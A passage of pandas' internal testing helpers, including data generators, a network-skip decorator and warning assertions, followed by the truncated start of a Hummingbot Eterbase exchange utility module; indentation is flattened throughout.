f"Expected object {repr(type(elem1))} and object {repr(type(elem2))} to be "
"different objects, but they were the same object."
)
assert elem1 is not elem2, msg
def is_extension_array_dtype_and_needs_i8_conversion(left_dtype, right_dtype) -> bool:
"""
    Checks that we have the combination of an ExtensionArray dtype and
    a dtype that should be converted to int64.
Returns
-------
bool
Related to issue #37609
"""
return is_extension_array_dtype(left_dtype) and needs_i8_conversion(right_dtype)
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
return pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
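# Illustrative sketch (not part of the original module): each make*Index helper above
# returns a length-k index of the corresponding type. Hypothetical helper, never called.
def _example_make_index_helpers():
    makeStringIndex(5)              # Index of 5 random 10-character strings
    makeIntIndex(5)                 # Index([0, 1, 2, 3, 4])
    makeDateIndex(5, name="ts")     # DatetimeIndex of 5 business days starting in Jan 2000
    makeCategoricalIndex(k=6, n=3)  # CategoricalIndex of length 6 drawn from 3 categories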
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
    Returns
    -------
    pd.DataFrame
        A DataFrame with a DatetimeIndex and the following columns:
        * name : object dtype with string names
        * id : int dtype with Poisson-distributed integer ids (mean 1000)
        * x, y : float dtype values drawn uniformly from [-1, 1)
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
yield from make_index_funcs
def all_timeseries_index_generator(k=10):
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
# pandas\_testing.py:1986: error: Cannot call function of unknown type
yield make_index_func(k=k) # type: ignore[operator]
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
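# Illustrative sketch (not part of the original module): the make*Series / make*DataFrame
# helpers above build small random objects sized by the module-level _N and _K constants.
# Hypothetical helper, never called.
def _example_make_frames():
    s = makeTimeSeries()          # Series of _N random floats over a business-day DatetimeIndex
    df = makeDataFrame()          # _N x _K DataFrame of random floats with string row labels
    mixed = makeMixedDataFrame()  # small DataFrame with float, string and datetime columns
    return s, df, mixed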
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
    Create an index/multiindex with given dimensions, levels, names, etc.
    nentries - number of entries in index
    nlevels - number of levels (> 1 produces multiindex)
    prefix - a string prefix for labels
    names - (Optional), bool or list of strings. If True will use default
        names, if False will use no names, if a list is given, the name of
        each level in the index will be taken from the list.
    ndupe_l - (Optional), list of ints, the number of rows for which the
        label will be repeated at the corresponding level, you can specify just
        the first few, the rest will use the default ndupe_l of 1.
        len(ndupe_l) <= nlevels.
    idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
        If idx_type is not None, `idx_nlevels` must be 1.
        "i"/"f" creates an integer/float index,
        "s"/"u" creates a string/unicode index,
        "dt" creates a datetime index,
        "p" creates a period index,
        "td" creates a timedelta index.
        If unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
    assert names is None or names is False or names is True or len(names) == nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = {
"i": makeIntIndex,
"f": makeFloatIndex,
"s": makeStringIndex,
"u": makeUnicodeIndex,
"dt": makeDateIndex,
"td": makeTimedeltaIndex,
"p": makePeriodIndex,
}.get(idx_type)
if idx_func:
# pandas\_testing.py:2120: error: Cannot call function of unknown type
idx = idx_func(nentries) # type: ignore[operator]
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
# pandas\_testing.py:2148: error: Need type annotation for 'cnt'
cnt = Counter() # type: ignore[var-annotated]
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
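# Illustrative sketch (not part of the original module): makeCustomIndex returns a plain
# Index when nlevels == 1 and a MultiIndex otherwise; idx_type selects a specific 1-D
# index type. Hypothetical helper, never called.
def _example_make_custom_index():
    makeCustomIndex(nentries=4, nlevels=1, idx_type="i")  # integer Index of length 4
    makeCustomIndex(nentries=4, nlevels=2, names=True)    # 2-level MultiIndex with default names
    makeCustomIndex(nentries=6, nlevels=2, ndupe_l=[2])   # first level repeats each label twice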
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
    c_idx_names, r_idx_names - False/True/list of strings, yields no names,
        default names or uses the provided names for the levels of the
        corresponding index. You can provide a single string when
        c_idx_nlevels == 1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
    data_gen_f - a function f(row,col) which returns the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
        nrows/ncols, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
    r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
        If idx_type is not None, `idx_nlevels` must be 1.
        "i"/"f" creates an integer/float index,
        "s"/"u" creates a string/unicode index,
        "dt" creates a datetime index,
        "p" creates a period index,
        "td" creates a timedelta index.
        If unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
    # 4-level multiindex on rows with names provided, 2-level multiindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
# pandas\_testing.py:2306: error: "_create_missing_idx" gets multiple
# values for keyword argument "density" [misc]
# pandas\_testing.py:2306: error: "_create_missing_idx" gets multiple
# values for keyword argument "random_state" [misc]
i, j = _create_missing_idx( # type: ignore[misc]
*df.shape, density=density, random_state=random_state
)
df.values[i, j] = np.nan
return df
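# Illustrative sketch (not part of the original module): makeMissingDataframe punches NaN
# holes into a random frame; density is the fraction of values kept, so density=0.8 leaves
# roughly 20% of the cells missing. Hypothetical helper, never called.
def _example_make_missing_dataframe():
    df = makeMissingDataframe(density=0.8, random_state=42)
    frac_missing = df.isna().to_numpy().mean()  # roughly 0.2
    return df, frac_missing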
def optional_args(decorator):
"""
allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)
"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
# pandas\_testing.py:2331: error: Incompatible types in assignment
# (expression has type "List[<nothing>]", variable has type
# "Tuple[Any, ...]")
args = [] # type: ignore[assignment]
return dec(f)
else:
return dec
return wrapper
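# Illustrative sketch (not part of the original module): optional_args lets a decorator be
# applied both bare and with keyword arguments. my_decorator/greeting are hypothetical
# names used only for illustration; the helper is never called.
def _example_optional_args():
    @optional_args
    def my_decorator(f, greeting="hello"):
        @wraps(f)
        def wrapped(*args, **kwargs):
            print(greeting)
            return f(*args, **kwargs)
        return wrapped

    @my_decorator                 # bare usage: calls my_decorator(f)
    def plain():
        return 1

    @my_decorator(greeting="hi")  # keyword usage: calls my_decorator(f, greeting="hi")
    def configured():
        return 2

    return plain(), configured()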
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flaky
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""
Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="https://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'https://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
Any exception that has .errno or .reason.erno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supersedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
    Tests decorated with @network will only fail if it's possible to make a
    network connection to the check URL (defaults to google.com); otherwise
    network-related errors cause the test to be skipped::
>>> from pandas._testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
    Traceback (most recent call last):
    ...
    URLError: <urlopen error unknown url type: rabbit>
You can specify alternative URLs::
>>> @network("https://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if (
check_before_test
and not raise_on_error
and not can_connect(url, error_classes)
):
skip()
try:
return t(*args, **kwargs)
except Exception as err:
errno = getattr(err, "errno", None)
            if not errno and hasattr(err, "reason"):
# pandas\_testing.py:2521: error: "Exception" has no attribute
# "reason"
errno = getattr(err.reason, "errno", None) # type: ignore[attr-defined]
if errno in skip_errnos:
skip(f"Skipping test due to known errno and error {err}")
e_str = str(err)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
f"Skipping test because exception message is known and error {err}"
)
if not isinstance(err, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(f"Skipping test due to lack of connectivity and error {err}")
return wrapper
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
expected_warning: Optional[Union[Type[Warning], bool]] = Warning,
filter_level="always",
check_stacklevel: bool = True,
raise_on_extra_warnings: bool = True,
match: Optional[str] = None,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
check_stacklevel : bool, default True
If True, displays the line that called the function containing
        the warning to show where the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
match : str, optional
Match warning message.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
    .. warning:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
saw_warning = False
matched_message = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if not expected_warning:
continue
expected_warning = cast(Type[Warning], expected_warning)
if issubclass(actual_warning.category, expected_warning):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
_assert_raised_with_correct_stacklevel(actual_warning)
if match is not None and re.search(match, str(actual_warning.message)):
matched_message = True
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
expected_warning = cast(Type[Warning], expected_warning)
if not saw_warning:
raise AssertionError(
f"Did not see expected warning of class "
f"{repr(expected_warning.__name__)}"
)
if match and not matched_message:
raise AssertionError(
f"Did not see warning {repr(expected_warning.__name__)} "
f"matching {match}"
)
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
f"Caused unexpected warning(s): {repr(extra_warnings)}"
)
def _assert_raised_with_correct_stacklevel(
actual_warning: warnings.WarningMessage,
) -> None:
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[3][0])
msg = (
"Warning not set with correct stacklevel. "
f"File where warning is raised: {actual_warning.filename} != "
f"{caller.filename}. Warning message: {actual_warning.message}"
)
assert actual_warning.filename == caller.filename, msg
class RNGContext:
"""
    Context manager to set the numpy random number generator seed. Returns
    to the original state upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
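# Illustrative sketch (not part of the original module): temporarily registering a CSV
# dialect and using it by name in read_csv. The dialect name "pipes" is hypothetical and
# the helper is never called.
def _example_with_csv_dialect():
    from io import StringIO
    data = "a|b\n1|2\n"
    with with_csv_dialect("pipes", delimiter="|"):
        df = pd.read_csv(StringIO(data), dialect="pipes")
    return df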
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr.USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
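# Illustrative sketch (not part of the original module): running the same function on two
# threads at once. Results are collected via a side effect because, as noted above, the
# decorator discards return values. Hypothetical helper, never called.
def _example_test_parallel():
    results = []

    @test_parallel(num_threads=2)
    def append_one():
        results.append(1)

    append_one()  # starts and joins 2 threads
    assert len(results) == 2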
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz: str):
"""
Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: List[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
return sep.join(rows_list) + sep
def external_error_raised(expected_exception: Type[Exception]) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None)
cython_table = pd.core.base.SelectionMixin._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from SelectionMixin._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of two items
The first item is a name of a NDFrame method ('sum', 'prod') etc.
The second item is the expected return value.
Returns
-------
list
List of three items (DataFrame, function, expected result)
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : string
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
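# Illustrative sketch (not part of the original module): get_op_from_name resolves plain
# operator names and synthesizes reversed ("r"-prefixed) variants. Hypothetical helper,
# never called.
def _example_get_op_from_name():
    add = get_op_from_name("__add__")
    radd = get_op_from_name("__radd__")
    assert add(2, 3) == 5
    assert radd("a", "b") == "ba"  # reversed: operator.add(y, x)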
|
eterbase_utils.py
|
import logging
from typing import Dict, Any, Optional, Tuple, List
import hummingbot.connector.exchange.eterbase.eterbase_constants as constants
from hummingbot.connector.exchange.eterbase.eterbase_auth import EterbaseAuth
from hummingbot.client.config.config_var import ConfigVar
from hummingbot.client.config.config_methods import using_exchange
import aiohttp
import asyncio
import json
from threading import Thread
_eu_logger = logging.getLogger(__name__)
shared_client = None
marketid_map = None
API_CALL_TIMEOUT = 10.0
CENTRALIZED = True
EXAMPLE_PAIR = "EUR-ETH"
DEFAULT_FEES = [0.35, 0.35]
async def _http_client(loop: Optional = None) -> aiohttp.ClientSession:
"""
:returns: Shared client session instance
"""
# calling API from different thread
if loop is not None:
return aiohttp.ClientSession(loop = loop)
    # calling API from the main thread
